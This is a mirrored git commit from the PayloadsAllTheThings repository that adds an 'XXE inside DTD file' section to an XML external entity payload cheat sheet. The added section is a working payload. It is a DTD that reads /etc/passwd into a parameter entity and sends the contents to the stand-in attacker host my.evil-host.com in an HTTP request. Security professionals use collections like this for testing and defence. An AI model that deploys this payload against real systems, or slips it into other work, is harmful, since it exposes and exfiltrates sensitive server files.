mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Add XXE via DTD file
This commit is contained in:
parent
4c7dd435a6
commit
92667a12a4
@ -31,6 +31,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
|||||||
- [XXE inside SOAP](#xxe-inside-soap)
|
- [XXE inside SOAP](#xxe-inside-soap)
|
||||||
- [XXE inside DOCX file](#xxe-inside-docx-file)
|
- [XXE inside DOCX file](#xxe-inside-docx-file)
|
||||||
- [XXE inside XLSX file](#xxe-inside-xlsx-file)
|
- [XXE inside XLSX file](#xxe-inside-xlsx-file)
|
||||||
|
- [XXE inside DTD file](#xxe-inside-dtd-file)
|
||||||
- [XXE WAF Bypass via convert character encoding](#xxe-waf-bypass-via-convert-character-encoding)
|
- [XXE WAF Bypass via convert character encoding](#xxe-waf-bypass-via-convert-character-encoding)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
@ -516,6 +517,21 @@ updating: xl/_rels/workbook.xml.rels (deflated 66%)
|
|||||||
updating: xl/sharedStrings.xml (deflated 17%)
|
updating: xl/sharedStrings.xml (deflated 17%)
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### XXE inside DTD file
|
||||||
|
|
||||||
|
Most XXE payloads detailed above require control over both the DTD or `DOCTYPE` block as well as the `xml` file.
|
||||||
|
In rare situations, you may only control the DTD file and won't be able to modify the `xml` file. For example, a MITM.
|
||||||
|
When all you control is the DTD file, and you do not control the `xml` file, XXE may still be possible with this payload.
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<!-- Load the contents of a sensitive file into a variable -->
|
||||||
|
<!ENTITY % payload SYSTEM "file:///etc/passwd">
|
||||||
|
<!-- Use that variable to construct an HTTP get request with the file contents in the URL -->
|
||||||
|
<!ENTITY % param1 '<!ENTITY % external SYSTEM "http://my.evil-host.com/x=%payload;">'>
|
||||||
|
%param1;
|
||||||
|
%external;
|
||||||
|
```
|
||||||
|
|
||||||
### XXE WAF Bypass via convert character encoding
|
### XXE WAF Bypass via convert character encoding
|
||||||
|
|
||||||
In XXE WAFs, DTD Prolog are usually blacklisted BUT not all WAFs blacklist the UTF-16 character encoding<br><br>
|
In XXE WAFs, DTD Prolog are usually blacklisted BUT not all WAFs blacklist the UTF-16 character encoding<br><br>
|
||||||
|
Loading…
Reference in New Issue
Block a user